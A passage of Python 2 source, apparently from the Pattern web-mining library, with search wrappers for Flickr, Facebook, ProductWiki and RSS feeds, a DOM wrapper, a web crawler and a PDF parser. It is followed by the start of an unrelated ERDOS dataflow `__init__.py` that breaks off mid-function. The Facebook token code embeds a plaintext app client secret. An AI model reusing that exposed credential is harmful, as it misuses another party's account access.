results.total = int(data.getElementsByTagName("photos")[0].getAttribute("total"))
for x in data.getElementsByTagName("photo"):
r = FlickrResult(url=None)
r.__dict__["_id"] = x.getAttribute("id")
r.__dict__["_size"] = size
r.__dict__["_license"] = self.license
r.__dict__["_throttle"] = self.throttle
r.text = self.format(x.getAttribute("title"))
r.author = self.format(x.getAttribute("owner"))
results.append(r)
return results
class FlickrResult(Result):
@property
def url(self):
# Retrieving the url of a FlickrResult (i.e. image location) requires another query.
# Note: the "Original" size no longer appears in the response,
# so Flickr might not like it if we download it.
url = FLICKR + "?method=flickr.photos.getSizes&photo_id=%s&api_key=%s" % (self._id, self._license)
data = URL(url).download(throttle=self._throttle, unicode=True)
data = xml.dom.minidom.parseString(bytestring(data))
size = { TINY: "Thumbnail",
SMALL: "Small",
MEDIUM: "Medium",
LARGE: "Original" }.get(self._size, "Medium")
for x in data.getElementsByTagName("size"):
if size == x.getAttribute("label"):
return x.getAttribute("source")
if size == "Original":
url = x.getAttribute("source")
url = url[:-len(extension(url))-2] + "_o" + extension(url)
return u(url)
#images = Flickr().search("kitten", count=10, size=SMALL)
#for img in images:
# print bytestring(img.description)
# print img.url
#
#data = img.download()
#f = open("kitten"+extension(img.url), "w")
#f.write(data)
#f.close()
#--- FACEBOOK --------------------------------------------------------------------------------------
# Facebook public status updates.
# https://developers.facebook.com/docs/reference/api/
FACEBOOK = "https://graph.facebook.com/"
FACEBOOK_LICENSE = api.license["Facebook"]
FEED = "feed" # Facebook timeline.
COMMENTS = "comments" # Facebook comments (for a given news feed post).
LIKES = "likes" # Facebook likes (for a given post or comment).
FRIENDS = "friends" # Facebook friends (for a given profile id).
class FacebookResult(Result):
def __repr__(self):
return "Result(id=%s)" % repr(self.id)
class Facebook(SearchEngine):
def __init__(self, license=None, throttle=1.0, language=None):
SearchEngine.__init__(self, license, throttle, language)
@property
def _token(self):
# Yields the "application access token" (stored in api.license["Facebook"]).
# With this license, we can view public content.
# To view more information, we need a "user access token" as license key.
# This token can be retrieved manually from:
# http://www.clips.ua.ac.be/media/pattern-fb.html
# Or parsed from this URL:
# https://graph.facebook.com/oauth/authorize?type=user_agent
# &client_id=332061826907464
# &redirect_uri=http%3A%2F%2Fwww.clips.ua.ac.be/media/pattern-facebook-token.html
# &scope=read_stream,user_birthday,user_likes,user_photos,friends_birthday,friends_likes
# The token is valid for a limited duration.
return URL(FACEBOOK + "oauth/access_token?", query={
"grant_type": "client_credentials",
"client_id": "332061826907464",
"client_secret": "81ff4204e73ecafcd87635a3a3683fbe"
}).download().split("=")[1]
def search(self, query, type=SEARCH, start=1, count=10, cached=False, **kwargs):
""" Returns a list of results from Facebook public status updates for the given query.
- query: string, or Result.id for NEWS and COMMENTS,
- type : SEARCH,
- start: 1,
- count: maximum 100 for SEARCH and NEWS, 1000 for COMMENTS and LIKES.
There is an hourly limit of +-600 queries (actual amount undisclosed).
"""
# Facebook.search(type=SEARCH) returns public posts + author.
# Facebook.search(type=NEWS) returns posts for the given author (id | alias | "me").
# Facebook.search(type=COMMENTS) returns comments for the given post id.
# Facebook.search(type=LIKES) returns authors for the given author, post or comments.
# An author is a Facebook user or other entity (e.g., a product page).
if type not in (SEARCH, NEWS, COMMENTS, LIKES, FRIENDS):
raise SearchEngineTypeError
if type in (SEARCH, NEWS):
max = 100
if type in (COMMENTS, LIKES):
max = 1000
if type in (FRIENDS,):
max = 10000
if not query or start < 1 or count < 1:
return Results(FACEBOOK, query, SEARCH)
if isinstance(query, FacebookResult):
query = query.id
# 1) Construct request URL.
if type == SEARCH:
url = FACEBOOK + type
url = URL(url, method=GET, query={
"q": query,
"type": "post",
"fields": ",".join(("id", "link", "message", "created_time", "from")),
"offset": (start-1) * min(count, max),
"limit": (start-0) * min(count, max),
})
if type in (NEWS, FEED, COMMENTS, LIKES, FRIENDS):
url = FACEBOOK + (u(query) or "me").replace(FACEBOOK, "") + "/" + type.replace("news", "feed")
url = URL(url, method=GET, query={
"access_token": self.license,
"offset": (start-1) * min(count, max),
"limit": (start-0) * min(count, max)
})
# 2) Parse JSON response.
kwargs.setdefault("cached", cached)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(**kwargs)
except HTTP400BadRequest:
raise HTTP401Authentication
data = json.loads(data)
results = Results(FACEBOOK, query, SEARCH)
results.total = None
for x in data.get("data", []):
r = FacebookResult(url=None)
r.id = self.format(x.get("id"))
r.url = self.format(x.get("link"))
r.text = self.format(x.get("story", x.get("message")))
r.date = self.format(x.get("created_time"))
# Store likes & comments count as int, author as (id, name)-tuple
# (by default Result will store everything as Unicode strings).
s = lambda r, k, v: dict.__setitem__(r, k, v)
s(r, "likes", \
self.format(x.get("like_count", x.get("likes", {}).get("count", 0))) + 0)
s(r, "comments", \
self.format(x.get("comments", {}).get("count", 0)) + 0)
s(r, "author", (
u(self.format(x.get("from", {}).get("id", ""))), \
u(self.format(x.get("from", {}).get("name", "")))))
# Replace Result.text with author name for likes.
if type in (LIKES, FRIENDS):
s(r, "author", (
u(self.format(x.get("id", ""))),
u(self.format(x.get("name", "")))))
r.text = \
self.format(x.get("name"))
# Replace Result.url Facebook URL with object id.
if r.url.startswith("http://www.facebook.com/photo"):
r.url = x.get("picture", r.url)
# Replace Result.url Facebook URL with full-size image.
if r.url.startswith("http://www.facebook.com/") and \
r.url.split("/")[-1].split("?")[0].isdigit():
r.url = r.url.split("/")[-1].split("?")[0].replace("_s", "_b")
results.append(r)
return results
def profile(self, id=None, **kwargs):
""" For the given author id or alias,
returns a (id, name, date of birth, gender, locale)-tuple.
"""
url = FACEBOOK + (u(id or "me")).replace(FACEBOOK, "")
url = URL(url, method=GET, query={"access_token": self.license})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(**kwargs)
data = json.loads(data)
except HTTP400BadRequest:
raise HTTP401Authentication
return (
u(data.get("id", "")),
u(data.get("name", "")),
u(data.get("birthday", "")),
u(data.get("gender", "")[:1]),
u(data.get("locale", ""))
)
#license = "" # Generate a license key at: http://www.clips.ua.ac.be/media/pattern-fb.html
#fb = Facebook(license)
#me = fb.profile()[0]
#for r in fb.search(me, type=NEWS, count=10):
# print r.id
# print r.text
# print r.url
# if r.comments > 0:
# print "%s comments:" % r.comments
# print [(r.text, r.author) for r in fb.search(r, type=COMMENTS)]
# if r.likes > 0:
# print "%s likes:" % r.likes
# print [r.author for r in fb.search(r, type=LIKES)]
# print
#--- PRODUCT REVIEWS -------------------------------------------------------------------------------
PRODUCTWIKI = "http://api.productwiki.com/connect/api.aspx"
PRODUCTWIKI_LICENSE = api.license["Products"]
class Products(SearchEngine):
def __init__(self, license=None, throttle=5.0, language=None):
SearchEngine.__init__(self, license or PRODUCTWIKI_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Productwiki for the given query.
Each Result.reviews is a list of (review, score)-items.
- type : SEARCH,
- start: maximum undefined,
- count: 20,
- sort : RELEVANCY.
There is no daily limit.
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or start < 1 or count < 1:
return Results(PRODUCTWIKI, query, type)
# 1) Construct request URL.
url = PRODUCTWIKI+"?"
url = URL(url, method=GET, query={
"key": self.license or "",
"q": query,
"page" : start,
"op": "search",
"fields": "proscons", # "description,proscons" is heavy.
"format": "json"
})
# 2) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = URL(url).download(cached=cached, **kwargs)
data = json.loads(data)
results = Results(PRODUCTWIKI, query, type)
results.total = None
for x in data.get("products", [])[:count]:
r = Result(url=None)
r.__dict__["title"] = u(x.get("title"))
r.__dict__["text"] = u(x.get("text"))
r.__dict__["reviews"] = []
reviews = x.get("community_review") or {}
for p in reviews.get("pros", []):
r.reviews.append((p.get("text", ""), int(p.get("score")) or +1))
for p in reviews.get("cons", []):
r.reviews.append((p.get("text", ""), int(p.get("score")) or -1))
r.__dict__["score"] = int(sum(score for review, score in r.reviews))
results.append(r)
# Highest score first.
results.sort(key=lambda r: r.score, reverse=True)
return results
#for r in Products().search("tablet"):
# print r.title
# print r.score
# print r.reviews
# print
#--- NEWS FEED -------------------------------------------------------------------------------------
# Based on the Universal Feed Parser by Mark Pilgrim:
# http://www.feedparser.org/
class Newsfeed(SearchEngine):
def __init__(self, license=None, throttle=1.0, language=None):
SearchEngine.__init__(self, license, throttle, language)
def search(self, query, type=NEWS, start=1, count=10, sort=LATEST, size=SMALL, cached=True, **kwargs):
""" Returns a list of results from the given RSS or Atom newsfeed URL.
"""
if type != NEWS:
raise SearchEngineTypeError
if not query or start < 1 or count < 1:
return Results(query, query, NEWS)
# 1) Construct request URL.
# 2) Parse RSS/Atom response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
tags = kwargs.pop("tags", [])
data = URL(query).download(cached=cached, **kwargs)
data = feedparser.parse(bytestring(data))
results = Results(query, query, NEWS)
results.total = None
for x in data["entries"][:count]:
s = "\n\n".join([v.get("value") for v in x.get("content", [])]) or x.get("summary")
r = Result(url=None)
r.id = self.format(x.get("id"))
r.url = self.format(x.get("link"))
r.title = self.format(x.get("title"))
r.text = self.format(s)
r.date = self.format(x.get("updated"))
r.author = self.format(x.get("author"))
r.language = self.format(x.get("content") and \
x.get("content")[0].get("language") or \
data.get("language"))
for tag in tags:
# Parse custom tags.
# Newsfeed.search(tags=["dc:identifier"]) => Result.dc_identifier.
tag = tag.replace(":", "_")
r[tag] = self.format(x.get(tag))
results.append(r)
return results
feeds = {
"Nature": "http://feeds.nature.com/nature/rss/current",
"Science": "http://www.sciencemag.org/rss/podcast.xml",
"Herald Tribune": "http://www.iht.com/rss/frontpage.xml",
"TIME": "http://feeds.feedburner.com/time/topstories",
"CNN": "http://rss.cnn.com/rss/edition.rss",
}
#for r in Newsfeed().search(feeds["Nature"]):
# print r.title
# print r.author
# print r.url
# print plaintext(r.text)
# print
#--- QUERY -----------------------------------------------------------------------------------------
def query(string, service=GOOGLE, **kwargs):
""" Returns the list of search query results from the given service.
For service=WIKIPEDIA, this is a single WikipediaArticle or None.
"""
service = service.lower()
if service in (GOOGLE, "google", "g"):
engine = Google
if service in (YAHOO, "yahoo", "y!"):
engine = Yahoo
if service in (BING, "bing"):
engine = Bing
if service in (TWITTER, "twitter"):
engine = Twitter
if service in (FACEBOOK, "facebook", "fb"):
engine = Facebook
if service in (WIKIA, "wikia"):
engine = Wikia
if service in (WIKIPEDIA, "wikipedia", "wp"):
engine = Wikipedia
if service in (FLICKR, "flickr"):
engine = Flickr
try:
kw = {}
for a in ("license", "throttle", "language"):
if a in kwargs:
kw[a] = kwargs.pop(a)
return engine(kw).search(string, **kwargs)
except UnboundLocalError:
raise SearchEngineError, "unknown search engine '%s'" % service
#--- WEB SORT --------------------------------------------------------------------------------------
SERVICES = {
GOOGLE : Google,
YAHOO : Yahoo,
BING : Bing,
TWITTER : Twitter,
WIKIPEDIA : Wikipedia,
WIKIA : Wikia,
FLICKR : Flickr,
FACEBOOK : Facebook
}
def sort(terms=[], context="", service=GOOGLE, license=None, strict=True, reverse=False, **kwargs):
""" Returns a list of (percentage, term)-tuples for the given list of terms.
Sorts the terms in the list according to search result count.
When a context is defined, sorts according to relevancy to the context, e.g.:
sort(terms=["black", "green", "red"], context="Darth Vader") =>
yields "black" as the best candidate, because "black Darth Vader" is more common in search results.
- terms : list of search terms,
- context : term used for sorting,
- service : web service name (GOOGLE, YAHOO, BING),
- license : web service license id,
- strict : when True the query constructed from term + context is wrapped in quotes.
"""
service = SERVICES.get(service, SearchEngine)(license, language=kwargs.pop("language", None))
R = []
for word in terms:
q = reverse and context+" "+word or word+" "+context
q.strip()
q = strict and "\"%s\"" % q or q
r = service.search(q, count=1, **kwargs)
R.append(r)
s = float(sum([r.total or 1 for r in R])) or 1.0
R = [((r.total or 1)/s, r.query) for r in R]
R = sorted(R, reverse=True)
return R
#print sort(["black", "happy"], "darth vader", GOOGLE)
#### DOCUMENT OBJECT MODEL #########################################################################
# Tree traversal of HTML source code.
# The Document Object Model (DOM) is a cross-platform and language-independent convention
# for representing and interacting with objects in HTML, XHTML and XML documents.
# BeautifulSoup is wrapped in Document, Element and Text classes that resemble the Javascript DOM.
# BeautifulSoup can of course be used directly since it is imported here.
# http://www.crummy.com/software/BeautifulSoup/
SOUP = (
BeautifulSoup.BeautifulSoup,
BeautifulSoup.Tag,
BeautifulSoup.NavigableString,
BeautifulSoup.Comment
)
NODE, TEXT, COMMENT, ELEMENT, DOCUMENT = \
"node", "text", "comment", "element", "document"
#--- NODE ------------------------------------------------------------------------------------------
class Node:
def __init__(self, html, type=NODE, **kwargs):
""" The base class for Text, Comment and Element.
All DOM nodes can be navigated in the same way (e.g. Node.parent, Node.children, ...)
"""
self.type = type
self._p = not isinstance(html, SOUP) and BeautifulSoup.BeautifulSoup(u(html), **kwargs) or html
@property
def _beautifulSoup(self):
# If you must, access the BeautifulSoup object with Node._beautifulSoup.
return self._p
def __eq__(self, other):
# Two Node objects containing the same BeautifulSoup object, are the same.
return isinstance(other, Node) and hash(self._p) == hash(other._p)
def _wrap(self, x):
# Navigating to other nodes yields either Text, Element or None.
if isinstance(x, BeautifulSoup.Comment):
return Comment(x)
if isinstance(x, BeautifulSoup.Declaration):
return Text(x)
if isinstance(x, BeautifulSoup.NavigableString):
return Text(x)
if isinstance(x, BeautifulSoup.Tag):
return Element(x)
@property
def parent(self):
return self._wrap(self._p.parent)
@property
def children(self):
return hasattr(self._p, "contents") and [self._wrap(x) for x in self._p.contents] or []
@property
def html(self):
return self.__unicode__()
@property
def source(self):
return self.__unicode__()
@property
def next_sibling(self):
return self._wrap(self._p.nextSibling)
@property
def previous_sibling(self):
return self._wrap(self._p.previousSibling)
next, previous = next_sibling, previous_sibling
def traverse(self, visit=lambda node: None):
""" Executes the visit function on this node and each of its child nodes.
"""
visit(self); [node.traverse(visit) for node in self.children]
def __len__(self):
return len(self.children)
def __iter__(self):
return iter(self.children)
def __getitem__(self, index):
return self.children[index]
def __repr__(self):
return "Node(type=%s)" % repr(self.type)
def __str__(self):
return bytestring(self.__unicode__())
def __unicode__(self):
return u(self._p)
#--- TEXT ------------------------------------------------------------------------------------------
class Text(Node):
""" Text represents a chunk of text without formatting in a HTML document.
For example: "the <b>cat</b>" is parsed to [Text("the"), Element("cat")].
"""
def __init__(self, string):
Node.__init__(self, string, type=TEXT)
def __repr__(self):
return "Text(%s)" % repr(self._p)
class Comment(Text):
""" Comment represents a comment in the HTML source code.
For example: "<!-- comment -->".
"""
def __init__(self, string):
Node.__init__(self, string, type=COMMENT)
def __repr__(self):
return "Comment(%s)" % repr(self._p)
#--- ELEMENT ---------------------------------------------------------------------------------------
class Element(Node):
def __init__(self, html):
""" Element represents an element or tag in the HTML source code.
For example: "<b>hello</b>" is a "b"-Element containing a child Text("hello").
"""
Node.__init__(self, html, type=ELEMENT)
@property
def tagname(self):
return self._p.name
tag = tagName = tagname
@property
def attributes(self):
return self._p._getAttrMap()
@property
def id(self):
return self.attributes.get("id")
def get_elements_by_tagname(self, v):
""" Returns a list of nested Elements with the given tag name.
The tag name can include a class (e.g. div.header) or an id (e.g. div#content).
"""
if isinstance(v, basestring) and "#" in v:
v1, v2 = v.split("#")
v1 = v1 in ("*","") or v1.lower()
return [Element(x) for x in self._p.findAll(v1, id=v2)]
if isinstance(v, basestring) and "." in v:
v1, v2 = v.split(".")
v1 = v1 in ("*","") or v1.lower()
return [Element(x) for x in self._p.findAll(v1, v2)]
return [Element(x) for x in self._p.findAll(v in ("*","") or v.lower())]
by_tag = getElementsByTagname = get_elements_by_tagname
def get_element_by_id(self, v):
""" Returns the first nested Element with the given id attribute value.
"""
return ([Element(x) for x in self._p.findAll(id=v, limit=1) or []]+[None])[0]
by_id = getElementById = get_element_by_id
def get_elements_by_classname(self, v):
""" Returns a list of nested Elements with the given class attribute value.
"""
return [Element(x) for x in (self._p.findAll(True, v))]
by_class = getElementsByClassname = get_elements_by_classname
def get_elements_by_attribute(self, **kwargs):
""" Returns a list of nested Elements with the given attribute value.
"""
return [Element(x) for x in (self._p.findAll(True, attrs=kwargs))]
by_attribute = getElementsByAttribute = get_elements_by_attribute
@property
def content(self):
""" Yields the element content as a unicode string.
"""
return u"".join([u(x) for x in self._p.contents])
@property
def source(self):
""" Yields the HTML source as a unicode string (tag + content).
"""
return u(self._p)
html = source
def __getattr__(self, k):
if k in self.__dict__:
return self.__dict__[k]
if k in self.attributes:
return self.attributes[k]
raise AttributeError, "'Element' object has no attribute '%s'" % k
def __repr__(self):
return "Element(tag='%s')" % bytestring(self.tagname)
#--- DOCUMENT --------------------------------------------------------------------------------------
class Document(Element):
def __init__(self, html, **kwargs):
""" Document is the top-level element in the Document Object Model.
It contains nested Element, Text and Comment nodes.
"""
# Aliases for BeautifulSoup optional parameters:
kwargs["selfClosingTags"] = kwargs.pop("self_closing", kwargs.get("selfClosingTags"))
Node.__init__(self, u(html).strip(), type=DOCUMENT, **kwargs)
@property
def declaration(self):
""" Yields the <!doctype> declaration, as a TEXT Node or None.
"""
for child in self.children:
if isinstance(child._p, BeautifulSoup.Declaration):
return child
@property
def head(self):
return self._wrap(self._p.head)
@property
def body(self):
return self._wrap(self._p.body)
@property
def tagname(self):
return None
tag = tagname
def __repr__(self):
return "Document()"
DOM = Document
#article = Wikipedia().search("Document Object Model")
#dom = DOM(article.html)
#print dom.get_element_by_id("References").source
#print [element.attributes["href"] for element in dom.get_elements_by_tagname("a")]
#print dom.get_elements_by_tagname("p")[0].next.previous.children[0].parent.__class__
#print
#### WEB CRAWLER ###################################################################################
# Tested with a crawl across 1,000 domain so far.
class Link:
def __init__(self, url, text="", relation="", referrer=""):
""" A hyperlink parsed from a HTML document, in the form:
<a href="url"", title="text", rel="relation">xxx</a>.
"""
self.url, self.text, self.relation, self.referrer = \
u(url), u(text), u(relation), u(referrer),
@property
def description(self):
return self.text
def __repr__(self):
return "Link(url=%s)" % repr(self.url)
# Used for sorting in Spider.links:
def __eq__(self, link):
return self.url == link.url
def __ne__(self, link):
return self.url != link.url
def __lt__(self, link):
return self.url < link.url
def __gt__(self, link):
return self.url > link.url
class HTMLLinkParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
def parse(self, html, url=""):
""" Returns a list of Links parsed from the given HTML string.
"""
if html is None:
return None
self._url = url
self._data = []
self.feed(self.clean(html))
self.close()
self.reset()
return self._data
def handle_starttag(self, tag, attributes):
if tag == "a":
attributes = dict(attributes)
if "href" in attributes:
link = Link(url = attributes.get("href"),
text = attributes.get("title"),
relation = attributes.get("rel", ""),
referrer = self._url)
self._data.append(link)
def base(url):
""" Returns the URL domain name:
http://en.wikipedia.org/wiki/Web_crawler => en.wikipedia.org
"""
return urlparse.urlparse(url).netloc
def abs(url, base=None):
""" Returns the absolute URL:
../media + http://en.wikipedia.org/wiki/ => http://en.wikipedia.org/media
"""
if url.startswith("#") and not base is None and not base.endswith("/"):
if not re.search("[^/]/[^/]", base):
base += "/"
return urlparse.urljoin(base, url)
DEPTH = "depth"
BREADTH = "breadth"
FIFO = "fifo" # First In, First Out.
FILO = "filo" # First In, Last Out.
LIFO = "lifo" # Last In, First Out (= FILO).
class Spider:
def __init__(self, links=[], domains=[], delay=20.0, parser=HTMLLinkParser().parse, sort=FIFO):
""" A spider can be used to browse the web in an automated manner.
It visits the list of starting URLs, parses links from their content, visits those, etc.
- Links can be prioritized by overriding Spider.priority().
- Links can be ignored by overriding Spider.follow().
- Each visited link is passed to Spider.visit(), which can be overridden.
"""
self.parse = parser
self.delay = delay # Delay between visits to the same (sub)domain.
self.domains = domains # Domains the spider is allowed to visit.
self.history = {} # Domain name => time last visited.
self.visited = {} # URLs visited.
self._queue = [] # URLs scheduled for a visit: (priority, time, Link).
self._queued = {} # URLs scheduled so far, lookup dictionary.
self.QUEUE = 10000 # Increase or decrease according to available memory.
self.sort = sort
# Queue given links in given order:
for link in (isinstance(links, basestring) and [links] or links):
self.push(link, priority=1.0, sort=FIFO)
@property
def done(self):
""" Yields True if no further links are scheduled to visit.
"""
return len(self._queue) == 0
def push(self, link, priority=1.0, sort=FILO):
""" Pushes the given link to the queue.
Position in the queue is determined by priority.
Equal ranks are sorted FIFO or FILO.
With priority=1.0 and FILO, the link is inserted to the queue.
With priority=0.0 and FIFO, the link is appended to the queue.
"""
if not isinstance(link, Link):
link = Link(url=link)
dt = time.time()
dt = sort == FIFO and dt or 1 / dt
bisect.insort(self._queue, (1 - priority, dt, link))
self._queued[link.url] = True
def pop(self, remove=True):
""" Returns the next Link queued to visit and removes it from the queue.
Links on a recently visited (sub)domain are skipped until Spider.delay has elapsed.
"""
now = time.time()
for i, (priority, dt, link) in enumerate(self._queue):
if self.delay <= now - self.history.get(base(link.url), 0):
if remove is True:
self._queue.pop(i)
self._queued.pop(link.url, None)
return link
@property
def next(self):
""" Returns the next Link queued to visit (without removing it).
"""
return self.pop(remove=False)
def crawl(self, method=DEPTH, **kwargs):
""" Visits the next link in Spider._queue.
If the link is on a domain recently visited (< Spider.delay) it is skipped.
Parses the content at the link for new links and adds them to the queue,
according to their Spider.priority().
Visited links (and content) are passed to Spider.visit().
"""
link = self.pop()
if link is None:
return False
if link.url not in self.visited:
t = time.time()
url = URL(link.url)
if url.mimetype == "text/html":
try:
kwargs.setdefault("unicode", True)
html = url.download(**kwargs)
for new in self.parse(html, url=link.url):
new.url = abs(new.url, base=url.redirect or link.url)
new.url = self.normalize(new.url)
# 1) Parse new links from HTML web pages.
# 2) Schedule unknown links for a visit.
# 3) Only links that are not already queued are queued.
# 4) Only links for which Spider.follow() is True are queued.
# 5) Only links on Spider.domains are queued.
if new.url in self.visited:
continue
if new.url in self._queued:
continue
if self.follow(new) is False:
continue
if self.domains and not base(new.url).endswith(tuple(self.domains)):
continue
# 6) Limit the queue (remove tail), unless you are Google.
if self.QUEUE is not None and \
self.QUEUE * 1.25 < len(self._queue):
self._queue = self._queue[:self.QUEUE]
self._queued.clear()
self._queued.update(dict((q[2].url, True) for q in self._queue))
# 7) Position in the queue is determined by Spider.priority().
# 8) Equal ranks are sorted FIFO or FILO.
self.push(new, priority=self.priority(new, method=method), sort=self.sort)
self.visit(link, source=html)
except URLError:
# URL can not be reached (HTTP404NotFound, URLTimeout).
self.fail(link)
else:
# URL MIME-type is not HTML, don't know how to handle.
self.fail(link)
# Log the current time visited for the domain (see Spider.pop()).
# Log the URL as visited.
self.history[base(link.url)] = time.time()
self.visited[link.url] = True
return True
# Nothing happened, we already visited this link.
return False
def normalize(self, url):
""" Called from Spider.crawl() to normalize URLs.
For example: return url.split("?")[0]
"""
# All links pass through here (visited or not).
# This can be a place to count backlinks.
return url
def follow(self, link):
""" Called from Spider.crawl() to determine if it should follow this link.
For example: return "nofollow" not in link.relation
"""
return True
def priority(self, link, method=DEPTH):
""" Called from Spider.crawl() to determine the priority of this link,
as a number between 0.0-1.0. Links with higher priority are visited first.
"""
# Depth-first search dislikes external links to other (sub)domains.
external = base(link.url) != base(link.referrer)
if external is True:
if method == DEPTH:
return 0.75
if method == BREADTH:
return 0.85
return 0.80
def visit(self, link, source=None):
""" Called from Spider.crawl() when the link is crawled.
When source=None, the link is not a web page (and was not parsed),
or possibly a URLTimeout occured (content size too big).
"""
pass
def fail(self, link):
""" Called from Spider.crawl() for link whose MIME-type could not be determined,
or which raised a URLError on download.
"""
pass
#class Spiderling(Spider):
# def visit(self, link, source=None):
# print "visited:", link.url, "from:", link.referrer
# def fail(self, link):
# print "failed:", link.url
#
#s = Spiderling(links=["http://nodebox.net/"], domains=["nodebox.net"], delay=5)
#while not s.done:
# s.crawl(method=DEPTH, cached=True, throttle=5)
#--- CRAWL FUNCTION --------------------------------------------------------------------------------
# Functional approach to crawling.
Crawler = Spider
def crawl(links=[], domains=[], delay=20.0, parser=HTMLLinkParser().parse, sort=FIFO, method=DEPTH, **kwargs):
""" Returns a generator that yields (Link, source)-tuples of visited pages.
When the crawler is busy, it yields (None, None).
When the crawler is done, it yields None.
"""
# The scenarios below defines "busy":
# - crawl(delay=10, throttle=0)
# The crawler will wait 10 seconds before visiting the same subdomain.
# The crawler will not throttle downloads, so the next link is visited instantly.
# So sometimes (None, None) is returned while it waits for an available subdomain.
# - crawl(delay=0, throttle=10)
# The crawler will halt 10 seconds after each visit.
# The crawler will not delay before visiting the same subdomain.
# So usually a result is returned each crawl.next(), but each call takes 10 seconds.
# - asynchronous(crawl().next)
# AsynchronousRequest.value is set to (Link, source) once AsynchronousRequest.done=True.
# The program will not halt in the meantime (i.e., the next crawl is threaded).
crawler = Crawler(links, domains, delay, parser, sort)
bind(crawler, "visit", \
lambda crawler, link, source=None: \
setattr(crawler, "crawled", (link, source))) # Define Crawler.visit() on-the-fly.
while not crawler.done:
crawler.crawled = (None, None)
crawler.crawl(method, **kwargs)
yield crawler.crawled
#for link, source in crawl("http://www.nodebox.net/", delay=0, throttle=10):
# print link
#g = crawl("http://www.nodebox.net/")
#for i in range(10):
# p = asynchronous(g.next)
# while not p.done:
# print "zzz..."
# time.sleep(0.1)
# link, source = p.value
# print link
#### PDF PARSER ####################################################################################
# Yusuke Shinyama, PDFMiner, http://www.unixuser.org/~euske/python/pdfminer/
class PDFParseError(Exception):
pass
class PDF:
def __init__(self, data, format=None):
""" Plaintext parsed from the given PDF data.
"""
self.content = self._parse(data, format)
@property
def string(self):
return self.content
def __unicode__(self):
return self.content
def _parse(self, data, format=None):
# The output will be ugly: it may be useful for mining but probably not for displaying.
# You can also try PDF(data, format="html") to preserve some layout information.
from pdf.pdfinterp import PDFResourceManager, process_pdf
from pdf.converter import TextConverter, HTMLConverter
from pdf.layout import LAParams
s = ""
m = PDFResourceManager()
try:
# Given data is a PDF file path.
data = os.path.exists(data) and open(data) or StringIO.StringIO(data)
except TypeError:
# Given data is a PDF string.
data = StringIO.StringIO(data)
try:
stream = StringIO.StringIO()
parser = format=="html" and HTMLConverter or TextConverter
parser = parser(m, stream, codec="utf-8", laparams=LAParams())
process_pdf(m, parser, data, set(), maxpages=0, password="")
except Exception, e:
raise PDFParseError, str(e)
s = stream.getvalue()
s = decode_utf8(s)
s = s.strip()
s = re.sub(r"([a-z])\-\n", "\\1", s) # Join hyphenated words.
s = s.replace("\n\n", "<!-- paragraph -->") # Preserve paragraph spacing.
s = s.replace("\n", " ")
s = s.replace("<!-- paragraph -->", "\n\n")
s = collapse_spaces(s)
return s
|
__init__.py
|
import multiprocessing as mp
import signal
import sys
from functools import wraps
import erdos.internal as _internal
from erdos.streams import (ReadStream, WriteStream, LoopStream, IngestStream,
ExtractStream)
from erdos.operator import Operator, OperatorConfig
from erdos.profile import Profile
from erdos.message import Message, WatermarkMessage
from erdos.timestamp import Timestamp
import erdos.utils
_num_py_operators = 0
def connect(op_type, config, read_streams, *args, **kwargs):
"""Registers the operator and its connected streams on the dataflow graph.
The operator is created as follows:
`op_type(*read_streams, *write_streams, *args, **kwargs)`
Args:
op_type (type): The operator class. Should inherit from
`erdos.Operator`.
config (OperatorConfig): Configuration details required by the
operator.
read_streams: the streams from which the operator processes data.
args: arguments passed to the operator.
kwargs: keyword arguments passed to the operator.
Returns:
read_streams (list of ReadStream): ReadStreams corresponding to the
WriteStreams returned by the operator's connect.
"""
if not issubclass(op_type, Operator):
raise TypeError("{} must subclass erdos.Operator".format(op_type))
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
py_read_streams = []
for stream in read_streams:
if isinstance(stream, LoopStream):
py_read_streams.append(stream._py_loop_stream.to_py_read_stream())
elif isinstance(stream, IngestStream):
py_read_streams.append(
stream._py_ingest_stream.to_py_read_stream())
elif isinstance(stream, ReadStream):
py_read_streams.append(stream._py_read_stream)
else:
raise TypeError("Unable to convert {stream} to ReadStream".format(
stream=stream))
internal_streams = _internal.connect(op_type, config, py_read_streams,
args, kwargs, node_id)
return [ReadStream(_py_read_stream=s) for s in internal_streams]
def reset():
"""Resets internal seed and creates a new dataflow graph.
Note that no streams or operators can be re-used safely.
"""
global _num_py_operators
_num_py_operators = 0
_internal.reset()
def run(graph_filename=None, start_port=9000):
"""Instantiates and runs the dataflow graph.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename (str): the filename to which to write the dataflow graph
as a DOT file.
start_port (int): the port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
"""
data_addresses = [
"127.0.0.1:{port}".format(port=start_port + i)
for i in range(_num_py_operators + 1)
]
control_addresses = [
"127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
for i in range(_num_py_operators + 1)
]
def runner(node_id, data_addresses, control_addresses):
_internal.run(node_id, data_addresses, control_addresses)
processes = [
mp.Process(target=runner, args=(i, data_addresses, control_addresses))
for i in range(1, _num_py_operators + 1)
]
for p in processes:
p.start()
# Needed to shut down child processes
def sigint_handler(sig, frame):
for p in processes:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
# The driver must always be on node 0 otherwise ingest and extract streams
# will break
_internal.run_async(0, data_addresses, control_addresses, graph_filename)
for p in processes:
p.join()
def run_async(graph_filename=None, start_port=9000):
"""Instantiates and runs the dataflow graph asynchronously.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename (str): the filename to which to write the dataflow graph
as a DOT file.
start_port (int): the port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
"""
data_addresses = [
"127.0.0.1:{port}".format(port=start_port + i)
for i in range(_num_py_operators + 1)
]
control_addresses = [
